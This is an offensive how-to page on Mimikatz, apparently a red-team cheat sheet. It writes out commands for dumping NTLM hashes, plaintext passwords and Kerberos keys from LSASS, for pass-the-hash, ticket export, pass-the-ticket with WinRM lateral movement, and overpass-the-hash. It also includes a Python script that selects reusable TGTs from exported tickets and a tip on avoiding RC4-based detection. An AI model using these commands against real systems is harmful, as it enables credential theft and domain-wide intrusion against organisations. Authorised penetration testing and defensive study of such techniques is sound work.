
Mimikatz

This section will cover ways to use Mimikatz.

Table of Contents
  • Overview
  • Dumping Hashes
  • Pass the Hash
  • Harvesting Kerberos Tickets
  • Pass the Ticket
    • Pass the Ticket using WinRM
  • Extracting Kerberos Keys
  • Pass the Key and OverPass the Hash

Overview

Mimikatz is a Windows post-exploitation tool that reads credential material (plaintext passwords where cached, NTLM hashes, Kerberos tickets and Kerberos keys) out of LSASS memory and reuses it for pass-the-hash, pass-the-ticket and overpass-the-hash attacks. Nearly every module on this page needs a local administrator context, because privilege::debug has to enable SeDebugPrivilege before LSASS can be opened; with LSA Protection (RunAsPPL) or Credential Guard enabled, the sekurlsa:: modules fail or return nothing useful.

Dumping Hashes

To dump credentials from LSASS memory, start Mimikatz from an elevated prompt and enter the following commands. privilege::debug enables SeDebugPrivilege, which is what lets Mimikatz open the LSASS process; token::elevate impersonates a SYSTEM token (not strictly required for sekurlsa::logonpasswords, but it also unlocks modules such as lsadump::sam); sekurlsa::logonpasswords then lists, for every logon session on the host, the username, domain, NTLM hash and, where WDigest caching is enabled, the plaintext password.

mimikatz.exe
privilege::debug
token::elevate
sekurlsa::logonpasswords

If privilege::debug fails with an RtlAdjustPrivilege error, the Mimikatz process is not running elevated.

Pass the Hash

Pass the hash injects an NTLM hash into a new process so that the process authenticates over the network as that user without the plaintext password. The one-liner below runs the modules in order and exits.

mimikatz.exe privilege::debug "sekurlsa::pth /user:<username> /rc4:<password hash> /domain:<domain> /run:cmd.exe" exit

Command breakdown:

  • privilege::debug - Enables SeDebugPrivilege so that Mimikatz can overwrite the credentials of the new process's logon session inside LSASS.
  • sekurlsa::pth - Runs the pass-the-hash module: it starts the process with a fresh logon session and replaces that session's NTLM (and RC4 Kerberos) key with the supplied hash.
  • /user:<username> - The username of the account to impersonate.
  • /rc4:<password hash> - The NT hash of the target user (the 32-hex-digit NTLM value from sekurlsa::logonpasswords). /ntlm: is an alias for the same parameter.
  • /domain:<domain> - The domain of the user account.
  • /run:cmd.exe - The process to start with the injected credentials; cmd.exe is also the default if /run is omitted.

An example for the user myuser in the acorp.lan domain, using an NT hash taken from the logonpasswords output:

mimikatz.exe privilege::debug "sekurlsa::pth /user:myuser /rc4:BCD82943C6AC81E7DFFBD85D253961FA /domain:acorp.lan /run:cmd.exe" exit

Locally, whoami in the new cmd.exe window still reports the original account; the injected hash is only used when the process authenticates to a remote service. The way to confirm the attack worked is therefore to access a resource on another host from that window, for example a UNC path on a server the impersonated user can reach.

Harvesting Kerberos Tickets

The sekurlsa::tickets /export module writes every Kerberos ticket held by every logon session on the host to .kirbi files in Mimikatz's current working directory (debug privilege is needed because the tickets are read out of LSASS; kerberos::list /export exports only the current session's tickets and needs no special privilege).

mimikatz.exe
privilege::debug
sekurlsa::tickets /export

A client name ending in $ belongs to a computer account. The file names are not random: the leading bracketed value is the ID of the logon session the ticket came from, followed by the ticket's group and index, its ticket flags as eight hex digits, and the client and service names:

[<logon session id>]-<group>-<index>-<flags>-<username>@<service>-<domain or host>.kirbi

Tickets whose service is krbtgt are TGTs; these are the ones worth reusing, because a TGT can be used to request a service ticket for any service in the domain, whereas a service ticket only works against the SPN it was issued for.
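To triage a directory of exported tickets before choosing one to pass, the following Python script (an added example, not part of the original page and not Mimikatz's own code) parses file names according to the naming convention described above, flags computer accounts and TGTs, and decodes the ticket-flags field. The exact name layout and the sample file names are assumptions constructed for the example; the regular expression is deliberately permissive about the service part so that small variations in how it is written still parse.

```python
import re
from collections import defaultdict

# Kerberos TicketFlags bits as they appear in the 8-hex-digit flags field
# (RFC 4120 bit numbering, most significant bit first).
TICKET_FLAGS = {
    0x40000000: "forwardable",
    0x20000000: "forwarded",
    0x10000000: "proxiable",
    0x08000000: "proxy",
    0x02000000: "postdated",
    0x01000000: "invalid",
    0x00800000: "renewable",
    0x00400000: "initial",
    0x00200000: "pre_authent",
    0x00100000: "hw_authent",
    0x00040000: "ok_as_delegate",
    0x00010000: "name_canonicalize",
}

# Assumed layout of an exported file name:
# [<logon session id>]-<group>-<index>-<flags>-<client>@<service...>.kirbi
# The service part is matched loosely because its spelling varies between export modules.
KIRBI_NAME = re.compile(
    r"^\[(?P<luid>[0-9a-f]+;[0-9a-f]+)\]-(?P<group>\d+)-(?P<index>\d+)-"
    r"(?P<flags>[0-9a-f]{8})-(?P<client>[^@]+)@(?P<service>.+)\.kirbi$",
    re.IGNORECASE,
)


def parse_kirbi_name(name):
    """Describe the ticket a .kirbi file name refers to, or return None if the name does not match."""
    m = KIRBI_NAME.match(name)
    if not m:
        return None
    flags = int(m["flags"], 16)
    return {
        "file": name,
        "session": m["luid"].lower(),
        "client": m["client"],
        "computer_account": m["client"].endswith("$"),        # machine accounts end in $
        "service": m["service"],
        "is_tgt": m["service"].lower().startswith("krbtgt"),  # TGTs are issued for krbtgt/<REALM>
        "flags": sorted(n for bit, n in TICKET_FLAGS.items() if flags & bit),
    }


def usable_tgts(names):
    """Group the TGTs that are both forwardable and renewable by the logon session they came from;
    these are the tickets worth passing with kerberos::ptt."""
    by_session = defaultdict(list)
    for name in names:
        t = parse_kirbi_name(name)
        if t and t["is_tgt"] and {"forwardable", "renewable"} <= set(t["flags"]):
            by_session[t["session"]].append(t)
    return dict(by_session)


# Constructed sample file names for the example; not real export output.
SAMPLE_EXPORT = [
    "[0;3e7]-2-0-40e10000-DC01$@krbtgt-ACORP.LAN.kirbi",
    "[0;3e7]-0-0-40a50000-DC01$@cifs-fs01.acorp.lan.kirbi",
    "[0;5f2c1]-2-0-40e10000-myuser@krbtgt-ACORP.LAN.kirbi",
    "[0;5f2c1]-0-1-40a10000-myuser@ldap-dc01.acorp.lan.kirbi",
    "notes.txt",
]

if __name__ == "__main__":
    for session, tickets in usable_tgts(SAMPLE_EXPORT).items():
        for t in tickets:
            kind = "computer" if t["computer_account"] else "user"
            print(f"session {session}: {kind} account {t['client']} -> {t['file']} ({', '.join(t['flags'])})")
```

Run it against a real export by replacing SAMPLE_EXPORT with os.listdir() of the export directory; the two krbtgt entries in the sample are the ones kerberos::ptt should be given, and the flags list tells you whether the TGT can be forwarded (needed for double-hop scenarios such as WinRM onward to a file server).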

Pass the Ticket

We can use the kerberos::ptt module with an exported .kirbi file to perform a Pass the Ticket attack. The module injects the ticket into the logon session Mimikatz is running in, so debug privilege is not strictly required for this step; privilege::debug is only needed when the ticket is being read out of LSASS.

privilege::debug
kerberos::ptt "path\to\exported\tickets"

Commands breakdown:

  • kerberos::ptt - Inject the ticket in the given .kirbi file into the current logon session. A directory path injects every .kirbi file it contains.
  • "path\to\exported\tickets" - The path of the exported ticket (or directory of tickets) to use.

An example will be:

privilege::debug
kerberos::ptt "C:\<ticket name>.kirbi"

After injection, klist in the same session lists the imported ticket. Use a TGT (a krbtgt ticket) that is still within its lifetime: an expired ticket imports without error but is rejected by the KDC as soon as it is used.

Pass the Ticket using WinRM

Because kerberos::ptt injects the ticket into the logon session that Mimikatz runs in, any process started afterwards from that same session authenticates with it. Launching PowerShell from that session and running Enter-PSSession therefore opens a WinRM session on the target as the user whose ticket was imported.

This can allow us to move laterally using the initial machine as a foothold.

Mimikatz:

privilege::debug
kerberos::ptt "path\to\exported\tickets"
exit

Command line:

powershell
Enter-PSSession -ComputerName <Computer Name>

Give the target's hostname or FQDN rather than its IP address: WinRM then authenticates with Kerberos and requests an HTTP/<host> service ticket using the injected TGT, whereas an IP address cannot be used for Kerberos and the injected ticket is never consulted. The impersonated account also has to be allowed to use WinRM on the target (local administrator or member of Remote Management Users); otherwise the connection is refused even though the ticket is valid.

Extracting Kerberos Keys

Kerberos long-term keys are derived from the account's password: the RC4_HMAC key is simply the NT hash, while the AES128 and AES256 keys are derived with PBKDF2 using the realm and username as salt, so they cannot be computed from the hash alone and have to be read from LSASS. The following commands enumerate and dump the keys of every logged-on user.

privilege::debug
sekurlsa::ekeys

Once the AES256_HMAC or RC4_HMAC keys are obtained, we can perform OverPass the Hash or Pass the Key attacks using Mimikatz or Rubeus. Prefer the AES key where one is listed: a TGT requested with an RC4 key (encryption type 23) stands out in a domain whose accounts normally use AES and is commonly alerted on.

Pass the Key and OverPass the Hash

Pass the Key and OverPass the Hash use an account's Kerberos key to obtain a TGT for it, rather than authenticating with NTLM. In Mimikatz the same sekurlsa::pth module is used; the key is supplied as whichever key type was dumped.

privilege::debug
sekurlsa::pth /domain:<domain> /user:<username> /ntlm:<key hash>

Command breakdown:

  • /domain:<domain> - Specify the domain.
  • /user:<username> - Specify the username to use for authentication.
  • /ntlm:<key hash> - The RC4_HMAC key, which is identical to the NT hash. To use an AES key from sekurlsa::ekeys instead, replace this with /aes128:<key> or /aes256:<key>.

An example will be:

privilege::debug
sekurlsa::pth /domain:acorp.lan /user:myuser /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

This will create a new cmd.exe window (/run was omitted, so cmd.exe is the default) that we can use to request access to any service we want as the target user. klist in that window is empty at first; the TGT is requested from the KDC with the injected key the first time the process authenticates to a domain resource, after which klist shows it.

Note that administrative rights on the source host are required: sekurlsa::pth writes the key into the new logon session inside LSASS, which depends on privilege::debug and therefore on a local administrator context.